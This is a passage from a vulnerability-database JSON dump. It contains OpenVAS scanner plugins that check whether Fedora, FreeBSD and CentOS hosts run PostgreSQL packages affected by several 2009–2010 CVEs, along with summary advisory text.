rpm:\"postgresql-devel~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:04", "bulletinFamily": "scanner", "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13381.", "modified": "2017-07-10T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66569", "id": "OPENVAS:66569", "title": "Fedora Core 12 FEDORA-2009-13381 (postgresql)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13381.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13381 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to latest upstream point releases\n\nChangeLog:\n\n* Wed Dec 16 2009 Tom Lane 8.4.2-1\n- Update to PostgreSQL 8.4.2, for various fixes described at\nhttp://www.postgresql.org/docs/8.4/static/release-8-4-2.html\nincluding two security issues\nRelated: #546321\nRelated: #547662\n- Use -N not the obsolete -n in useradd call\nResolves: #495727\n- Clean up specfile to eliminate rpmlint gripes, mainly by removing\nno-longer-needed provisions for superseding rh-postgresql\n- add sparc/sparc64 to multilib header support\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13381\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13381.\";\n\n\n\nif(description)\n{\n script_id(66569);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2009-4034\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 12 FEDORA-2009-13381 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=546321\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=547662\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:14:08", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-23T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66611", "id": "OPENVAS:66611", "title": "FreeBSD Ports: postgresql-client, postgresql-server", "type": "openvas", "sourceData": "#\n#VID e7bc5600-eaa0-11de-bd9c-00215c6a37bb\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID e7bc5600-eaa0-11de-bd9c-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n postgresql-client\n postgresql-server\n\nCVE-2009-4034\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly handle a '\\0' character in a domain name in\nthe subject's Common Name (CN) field of an X.509 certificate, which\n(1) allows man-in-the-middle attackers to spoof arbitrary SSL-based\nPostgreSQL servers via a crafted server certificate issued by a\nlegitimate Certification Authority, and (2) allows remote attackers to\nbypass intended client-hostname restrictions via a crafted client\ncertificate issued by a legitimate Certification Authority, a related\nissue to CVE-2009-2408.\n\nCVE-2009-4136\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly manage session-local state during execution of\nan index function by a database superuser, which allows remote\nauthenticated users to gain privileges via a table with crafted index\nfunctions, as demonstrated by functions that modify (1) search_path or\n(2) a prepared statement, a related issue to CVE-2007-6600 and\nCVE-2009-3230.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\nif(description)\n{\n script_id(66611);\n script_version(\"$Revision: 4847 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-23 10:33:16 +0100 (Fri, 23 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: postgresql-client, postgresql-server\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"postgresql-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4.27\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.0\")>=0 && revcomp(a:bver, b:\"8.0.23\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1.19\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2.15\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3.9\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.4\")>=0 && revcomp(a:bver, b:\"8.4.2\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"postgresql-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4.27\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.0\")>=0 && revcomp(a:bver, b:\"8.0.23\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1.19\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2.15\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3.9\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.4\")>=0 && revcomp(a:bver, b:\"8.4.2\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066611", "id": "OPENVAS:136141256231066611", "type": "openvas", "title": "FreeBSD Ports: postgresql-client, postgresql-server", "sourceData": "#\n#VID e7bc5600-eaa0-11de-bd9c-00215c6a37bb\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID e7bc5600-eaa0-11de-bd9c-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n postgresql-client\n postgresql-server\n\nCVE-2009-4034\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly handle a '\\0' character in a domain name in\nthe subject's Common Name (CN) field of an X.509 certificate, which\n(1) allows man-in-the-middle attackers to spoof arbitrary SSL-based\nPostgreSQL servers via a crafted server certificate issued by a\nlegitimate Certification Authority, and (2) allows remote attackers to\nbypass intended client-hostname restrictions via a crafted client\ncertificate issued by a legitimate Certification Authority, a related\nissue to CVE-2009-2408.\n\nCVE-2009-4136\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly manage session-local state during execution of\nan index function by a database superuser, which allows remote\nauthenticated users to gain privileges via a table with crafted index\nfunctions, as demonstrated by functions that modify (1) search_path or\n(2) a prepared statement, a related issue to CVE-2007-6600 and\nCVE-2009-3230.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66611\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: postgresql-client, postgresql-server\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"postgresql-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4.27\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.0\")>=0 && revcomp(a:bver, b:\"8.0.23\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1.19\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2.15\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3.9\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.4\")>=0 && revcomp(a:bver, b:\"8.4.2\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"postgresql-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4.27\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.0\")>=0 && revcomp(a:bver, b:\"8.0.23\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1.19\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2.15\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3.9\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.4\")>=0 && revcomp(a:bver, b:\"8.4.2\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:04:51", "bulletinFamily": "scanner", "description": "Check for the Version of postgresql", "modified": "2018-04-06T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880656", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880656", "title": "CentOS Update for postgresql CESA-2010:0429 centos5 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postgresql CESA-2010:0429 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PostgreSQL is an advanced object-relational database management system\n (DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\n Perl and Tcl languages, and are installed in trusted mode by default. In\n trusted mode, certain operations, such as operating system level access,\n are restricted.\n\n A flaw was found in the way PostgreSQL enforced permission checks on\n scripts written in PL/Perl. If the PL/Perl procedural language was\n registered on a particular database, an authenticated database user running\n a specially-crafted PL/Perl script could use this flaw to bypass intended\n PL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\n scripts with the privileges of the database server. (CVE-2010-1169)\n \n Red Hat would like to thank Tim Bunce for responsibly reporting the\n CVE-2010-1169 flaw.\n \n A flaw was found in the way PostgreSQL enforced permission checks on\n scripts written in PL/Tcl. If the PL/Tcl procedural language was registered\n on a particular database, an authenticated database user running a\n specially-crafted PL/Tcl script could use this flaw to bypass intended\n PL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\n scripts with the privileges of the database server. (CVE-2010-1170)\n \n A buffer overflow flaw was found in the way PostgreSQL retrieved a\n substring from the bit string for BIT() and BIT VARYING() SQL data types.\n An authenticated database user running a specially-crafted SQL query could\n use this flaw to cause a temporary denial of service (postgres daemon\n crash) or, potentially, execute arbitrary code with the privileges of the\n database server. (CVE-2010-0442)\n \n An integer overflow flaw was found in the way PostgreSQL used to calculate\n the size of the hash table for joined relations. An authenticated database\n user could create a specially-crafted SQL query which could cause a\n temporary denial of service (postgres daemon crash) or, potentially,\n execute arbitrary code with the privileges of the database server.\n (CVE-2010-0733)\n \n PostgreSQL improperly protected session-local state during the execution of\n an index function by a database superuser during the database maintenance\n operations. An authenticated database user could use this flaw to elevate\n their privileges via specially-crafted index functions. (CVE-2009-4136)\n \n These packages upgrade PostgreSQL to version 8.1.21. Refer to the\n PostgreSQL Release Notes for a list of changes:\n \n http://www.postgresql.org/do ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"postgresql on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-May/016650.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880656\");\n script_version(\"$Revision: 9371 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:55:06 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0429\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2010-0442\", \"CVE-2010-0733\", \"CVE-2010-1169\", \"CVE-2010-1170\");\n script_name(\"CentOS Update for postgresql CESA-2010:0429 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postgresql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.1.21~1.el5_5.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:24", "bulletinFamily": "unix", "description": "It was discovered that PostgreSQL did not properly handle certificates with NULL characters in the Common Name field of X.509 certificates. An attacker could exploit this to 